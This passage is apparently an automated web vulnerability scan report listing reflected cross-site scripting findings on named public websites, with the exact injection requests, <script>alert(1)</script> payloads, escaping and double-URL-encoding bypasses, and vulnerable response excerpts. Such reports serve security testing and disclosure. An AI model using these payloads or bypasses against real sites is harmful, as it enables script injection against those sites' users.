GET /server-statuse356a"><script>alert(1)</script>7ad6e41a8ab HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.offers.com
Accept: */*
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 02:05:32 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14 ZendServer/5.0
Set-Cookie: psid=73040e76cecd228c351039c0cfb0f036bd4f7461; path=/; domain=offers.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: ouid=1364941793908559727%26855236cdeccbfbb50b8e81e43b4f876c27556d982f52da2a7e23983efce74cc3; expires=Fri, 01-Mar-2013 05:00:00 GMT; path=/; domain=offers.com
Set-Cookie: ostt=1364941793911705456%2608bc587c01bfd5fdd61904a8438ee899b8f444a49b0188301a5bf2f8ec00691b; expires=Sat, 02-Apr-2011 02:35:32 GMT; path=/; domain=www.offers.com
Set-Cookie: osbt=1364941793911705456%2608bc587c01bfd5fdd61904a8438ee899b8f444a49b0188301a5bf2f8ec00691b; path=/; domain=www.offers.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 34664

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equi
...[SNIP]...
<link rel="canonical" href="http://offers.com/server-statuse356a"><script>alert(1)</script>7ad6e41a8ab/" />
...[SNIP]...

3.65. http://www.patch.com/server-status [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.patch.com
Path:	/server-status

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a3ab7\"%3balert(1)//1f61db5babd was submitted in the REST URL parameter 1. This input was echoed as a3ab7\\";alert(1)//1f61db5babd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Request

GET /server-statusa3ab7\"%3balert(1)//1f61db5babd HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.patch.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 02:41:19 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8l Phusion_Passenger/3.0.2
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.2
X-Rack-Cache: miss
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _patch_session=BAh7BzoPc2Vzc2lvbl9pZCIlM2E5ZmNiYzBlMzI2NTFlNzkyYjE4NTdmZTdmYmIzY2Q6EF9jc3JmX3Rva2VuIjFhU0dhcGl3L2gwSXBSN0JXc3JzclVMRTlwaEp2U1RTUmpNNzI1YitWZkFnPQ%3D%3D--b6eff7a60074f048b83f2f4aba546015203dbb18; domain=patch.com; path=/
Content-Length: 24900
Status: 404
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html xmlns:fb='http://www.facebook.com/2008/fbml' xmlns:og='http://opengraphprotocol.org/schema/' xmlns='http://www.w3.org/1999/xhtml'>
<head>
<script type="text/javascript">
//<![CDA
...[SNIP]...
nalFilters="javascript:,patch.com,sjobs.brassring.com";
s_265.server="patchfe-d29.ihost.aol.com"
s_265.pageName="";
s_265.prop1="www";
s_265.prop16="1";
s_265.prop12="http://www.patch.com/server-statusa3ab7\\";alert(1)//1f61db5babd";
s_265.prop2="Misc";
s_265.events="";
s_265.products="";
s_265.eVar2="Guest";
s_265.eVar1="102";
s_265.mmxgo=true;
var s_code=s_265.t();
}
s_account="aolsvc,aolpatch";
omni_bN_host="www.patch.com";
i
...[SNIP]...

3.66. http://www.pcpitstop.com/server-status [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcpitstop.com
Path:	/server-status

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 892d6"><script>alert(1)</script>bd699dc7d53 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-status?892d6"><script>alert(1)</script>bd699dc7d53=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.pcpitstop.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not found
Date: Sat, 02 Apr 2011 02:11:47 GMT
Server: Microsoft-IIS/6.0
ETag:
Content-Length: 9015
Content-Type: text/html
Cache-control: private

<html>
<head>
<title>PC Pitstop: Not Found</title>



<meta http-equiv=
...[SNIP]...
<a href="/error404.asp?404;http://www.pcpitstop.com:80/server-status?892d6"><script>alert(1)</script>bd699dc7d53=1&print=1">
...[SNIP]...

3.67. http://www.picosearch.com/server-status [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.picosearch.com
Path:	/server-status

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8c367<script>alert(1)</script>b5abe79dc4c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-status8c367<script>alert(1)</script>b5abe79dc4c HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.picosearch.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 02:15:43 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_perl/2.0.3 Perl/v5.8.8
Connection: close
Content-Type: text/html
Content-Length: 1352

<html>
<head>
<title>PicoSearch Error</title>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
</head>
<body text=#333333 bgcolor=#ffffff>

<table border=0 cellpadding=
...[SNIP]...
<p>
The requested URL /server-status8c367<script>alert(1)</script>b5abe79dc4c was not found on this server.
</p>
...[SNIP]...

3.68. http://www.prescriptiondrug-info.com/server-status [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.prescriptiondrug-info.com
Path:	/server-status

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab681"><script>alert(1)</script>21eeba426d2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-status?ab681"><script>alert(1)</script>21eeba426d2=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.prescriptiondrug-info.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 02:46:09 GMT
Server: Microsoft-IIS/6.0
Pragma: no-cache
Content-Length: 33024
Content-Type: text/html
Expires: Sat, 02 Apr 2011 02:45:09 GMT
Cache-control: no-cache

<!DOCTYPE html>
<html lang="en">
<head>
   <title>404 Error - The People's Medicine Community</title>
   <meta charset="utf-8"/>
   <meta name="Description" content="Learn about and discuss drugs freel
...[SNIP]...
<link rel="canonical" href="http://www.prescriptiondrug-info.com/404.asp?404;http://www.prescriptiondrug-info.com:80/server-status?ab681"><script>alert(1)</script>21eeba426d2=1"/>
...[SNIP]...

3.69. http://www.pronto.com/server-status [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pronto.com
Path:	/server-status

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1a846'><script>alert(1)</script>a279237148 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-status1a846'><script>alert(1)</script>a279237148 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.pronto.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 02:39:04 GMT
Server: Apache/2.2.4 (Fedora)
Content-Type: text/html;charset=ISO-8859-1
Via: CN-5000
Proxy-Connection: Keep-Alive
Content-Length: 90401

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"

...[SNIP]...
<meta content='http://www.pronto.com/server-status1a846'><script>alert(1)</script>a279237148' property='og:url'/>
...[SNIP]...

3.70. http://www.rzaz.net/server-status [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.rzaz.net
Path:	/server-status

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14d70"><script>alert(1)</script>61f0fa7877c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-status14d70"><script>alert(1)</script>61f0fa7877c HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.rzaz.net
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 02:00:25 GMT
Server: Apache/2.2.3 (CentOS)
Cneonction: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 774

<html>
<head>
<title>www.rzaz.net</title>
<meta name="keywords" content="">
</head>
<frameset ROWS="100%,*" BORDER="0" FRAMEBORDER="0" FRAMESPACING="0">
<frame NAME="top" SRC="http://searchportal.inf
...[SNIP]...
<a HREF="http://searchportal.information.com/?o_id=111662&domainname=www.rzaz.net./server-status14d70"><script>alert(1)</script>61f0fa7877c">
...[SNIP]...

3.71. http://www.rzaz.net/server-status [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.rzaz.net
Path:	/server-status

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ea90"><script>alert(1)</script>789736ff2ae was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /6ea90"><script>alert(1)</script>789736ff2ae HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.rzaz.net
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 02:00:25 GMT
Server: Apache/2.2.3 (CentOS)
Cneonction: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 735

<html>
<head>
<title>www.rzaz.net</title>
<meta name="keywords" content="">
</head>
<frameset ROWS="100%,*" BORDER="0" FRAMEBORDER="0" FRAMESPACING="0">
<frame NAME="top" SRC="http://searchportal.information.com/?o_id=111662&domainname=www.rzaz.net./6ea90"><script>alert(1)</script>789736ff2ae" NORESIZE>
...[SNIP]...

3.72. http://www.rzaz.net/server-status [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.rzaz.net
Path:	/server-status

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 39961<script>alert(1)</script>ce44caf0b5c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-status39961<script>alert(1)</script>ce44caf0b5c HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.rzaz.net
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 02:00:26 GMT
Server: Apache/2.2.3 (CentOS)
Cneonction: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 709

<html>
<head>
<title>www.rzaz.net</title>
<meta name="keywords" content="">
</head>
<frameset ROWS='100%, *' BORDER=0 FRAMEBORDER=no FRAMESPACING=0>
<frame SRC="http://searchportal.information.com/?o_
...[SNIP]...
</script>ce44caf0b5c">http://searchportal.information.com/?o_id=111662&domainname=www.rzaz.net./server-status39961<script>alert(1)</script>ce44caf0b5c</a>
...[SNIP]...

3.73. http://www.rzaz.net/server-status [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.rzaz.net
Path:	/server-status

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bfab7"><script>alert(1)</script>53d0cc9ed9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-status?bfab7"><script>alert(1)</script>53d0cc9ed9=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.rzaz.net
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 02:00:12 GMT
Server: Apache/2.2.3 (CentOS)
Cneonction: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 780

<html>
<head>
<title>www.rzaz.net</title>
<meta name="keywords" content="">
</head>
<frameset ROWS="100%,*" BORDER="0" FRAMEBORDER="0" FRAMESPACING="0">
<frame NAME="top" SRC="http://searchportal.information.com/?o_id=111662&domainname=www.rzaz.net./server-status?bfab7"><script>alert(1)</script>53d0cc9ed9=1" NORESIZE>
...[SNIP]...

3.74. http://www.rzaz.net/server-status [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.rzaz.net
Path:	/server-status

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8fb39"><script>alert(1)</script>a7dfbcd982d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-status?8fb39"><script>alert(1)</script>a7dfbcd982d=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.rzaz.net
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 02:00:11 GMT
Server: Apache/2.2.3 (CentOS)
Cneonction: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 783

<html>
<head>
<title>www.rzaz.net</title>
<meta name="keywords" content="">
</head>
<frameset ROWS="100%,*" BORDER="0" FRAMEBORDER="0" FRAMESPACING="0">
<frame NAME="top" SRC="http://searchportal.inf
...[SNIP]...
<a HREF="http://searchportal.information.com/?o_id=111662&domainname=www.rzaz.net./server-status?8fb39"><script>alert(1)</script>a7dfbcd982d=1">
...[SNIP]...

3.75. http://www.rzaz.net/server-status [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.rzaz.net
Path:	/server-status

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload f8089<script>alert(1)</script>e71378634fe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-status?f8089<script>alert(1)</script>e71378634fe=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.rzaz.net
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 02:00:12 GMT
Server: Apache/2.2.3 (CentOS)
Cneonction: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 777

<html>
<head>
<title>www.rzaz.net</title>
<meta name="keywords" content="">
</head>
<frameset ROWS="100%,*" BORDER="0" FRAMEBORDER="0" FRAMESPACING="0">
<frame NAME="top" SRC="http://searchportal.inf
...[SNIP]...
</script>e71378634fe=1">http://searchportal.information.com/?o_id=111662&domainname=www.rzaz.net./server-status?f8089<script>alert(1)</script>e71378634fe=1</a>
...[SNIP]...

3.76. http://www.simplejobing.com/server-status [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.simplejobing.com
Path:	/server-status

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f8bb%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb28ed646af4 was submitted in the REST URL parameter 1. This input was echoed as 6f8bb"><script>alert(1)</script>b28ed646af4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /server-status6f8bb%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb28ed646af4 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.simplejobing.com
Accept: */*
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private, max-age=0, must-revalidate
Content-Type: text/html; charset=utf-8
Date: Sat, 02 Apr 2011 02:47:41 GMT
ETag: "10ba8ef0312a2b717d43a9ab0693271f"
Server: Apache/2.2.11 (Ubuntu) Phusion_Passenger/3.0.2
Status: 200
Vary: Accept-Encoding
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.2
X-Runtime: 2876
Content-Length: 11196
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="cs" lang="cs">
<head>
<meta htt
...[SNIP]...
<input name="query" id="query" value="server-status6f8bb"><script>alert(1)</script>b28ed646af4" type="text">
...[SNIP]...

3.77. http://www.smartertravel.com/server-status [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.smartertravel.com
Path:	/server-status

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f426e<script>alert(1)</script>57a698dc0b3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-statusf426e<script>alert(1)</script>57a698dc0b3 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.smartertravel.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 02:21:51 GMT
Server: Apache
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: STM=0dbb1d86f112f6e056dc3a76248e9464fb087e1166430178e53f44e399c3ed8964411164a27b51e4716f814f30def65998ed302362430ae96ca797fb29c8dca5; expires=Sun, 01-Apr-2012 02:21:51 GMT; path=/
Set-Cookie: vid=4d96883f33d629.84684801; path=/; domain=.smartertravel.com
Set-Cookie: uu=674a46b7-9450-4568-a96c-e2b6bc46278e; path=/; domain=.smartertravel.com
Set-Cookie: STMUL=deleted; expires=Fri, 02-Apr-2010 02:21:50 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Fri, 02-Apr-2010 02:21:50 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Fri, 02-Apr-2010 02:21:50 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=404+Error; path=/
Set-Cookie: entry_time=time; path=/; domain=smartertravel.com
Vary: Accept-Encoding,User-Agent
Content-Type: text/html
Content-Length: 23917

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
</strong> http://www.smartertravel.com/server-statusf426e<script>alert(1)</script>57a698dc0b3</p>
...[SNIP]...

3.78. http://www.tech-archive.net/server-status [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.tech-archive.net
Path:	/server-status

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 48428<a>f478f6185bb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /server-status48428<a>f478f6185bb HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tech-archive.net
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Sat, 02 Apr 2011 02:18:37 GMT
Last-Modified: Wed, 06 Jul 2005 17:51:31 GMT
Server: ApacheDK
Content-Type: text/html
Content-Length: 6202

<!doctype html public "-//w3c//dtd html 4.0 transitional//en">
<html>
<head>
<meta name="Author" content="Ulrich Keil">
<meta name="Publisher" content="Ulrich Keil">
<meta name="Copyright" content="Ul
...[SNIP]...
<a>f478f6185bb/">server-status48428<a>f478f6185bb</a>
...[SNIP]...

3.79. http://www.tech-archive.net/server-status [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.tech-archive.net
Path:	/server-status

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64c56"><a>431af7671d9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /server-status64c56"><a>431af7671d9 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tech-archive.net
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Sat, 02 Apr 2011 02:18:31 GMT
Last-Modified: Wed, 06 Jul 2005 17:51:31 GMT
Server: ApacheDK
Content-Type: text/html
Content-Length: 6206

<!doctype html public "-//w3c//dtd html 4.0 transitional//en">
<html>
<head>
<meta name="Author" content="Ulrich Keil">
<meta name="Publisher" content="Ulrich Keil">
<meta name="Copyright" content="Ul
...[SNIP]...
<a href="http://www.tech-archive.net/server-status64c56"><a>431af7671d9/">
...[SNIP]...

3.80. http://www.tech-archive.net/server-status [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.tech-archive.net
Path:	/server-status

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 9e79f<a>e7ac0a7d6eb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /server-status?9e79f<a>e7ac0a7d6eb=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tech-archive.net
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Sat, 02 Apr 2011 02:18:07 GMT
Last-Modified: Wed, 06 Jul 2005 17:51:31 GMT
Server: ApacheDK
Content-Type: text/html
Content-Length: 6208

<!doctype html public "-//w3c//dtd html 4.0 transitional//en">
<html>
<head>
<meta name="Author" content="Ulrich Keil">
<meta name="Publisher" content="Ulrich Keil">
<meta name="Copyright" content="Ul
...[SNIP]...
<a>e7ac0a7d6eb=1/">server-status?9e79f<a>e7ac0a7d6eb=1</a>
...[SNIP]...

3.81. http://www.tech-archive.net/server-status [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.tech-archive.net
Path:	/server-status

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2da0a"><a>eb69e724cdb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /server-status?2da0a"><a>eb69e724cdb=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tech-archive.net
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Sat, 02 Apr 2011 02:18:01 GMT
Last-Modified: Wed, 06 Jul 2005 17:51:31 GMT
Server: ApacheDK
Content-Type: text/html
Content-Length: 6212

<!doctype html public "-//w3c//dtd html 4.0 transitional//en">
<html>
<head>
<meta name="Author" content="Ulrich Keil">
<meta name="Publisher" content="Ulrich Keil">
<meta name="Copyright" content="Ul
...[SNIP]...
<a href="http://www.tech-archive.net/server-status?2da0a"><a>eb69e724cdb=1/">
...[SNIP]...

3.82. http://www.thenation.com/server-status [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.thenation.com
Path:	/server-status

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 54b13"><script>alert(1)</script>c291b4b4d5e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-status54b13"><script>alert(1)</script>c291b4b4d5e HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.thenation.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=600
Last-Modified: Sat, 02 Apr 2011 02:42:24 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1301712144"
Content-Type: text/html; charset=utf-8
Content-Length: 19140
Date: Sat, 02 Apr 2011 02:42:24 GMT
X-Varnish: 2024713588
Age: 0
Via: 1.1 varnish
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:dc="http://purl.org/dc/elements/1.1
...[SNIP]...
<a href="/user?destination=server-status54b13"><script>alert(1)</script>c291b4b4d5e">
...[SNIP]...

3.83. http://www.thenation.com/server-status [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.thenation.com
Path:	/server-status

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b6bc"><script>alert(1)</script>dff9df1199 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-status?2b6bc"><script>alert(1)</script>dff9df1199=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.thenation.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=600
Last-Modified: Sat, 02 Apr 2011 02:41:56 +0000
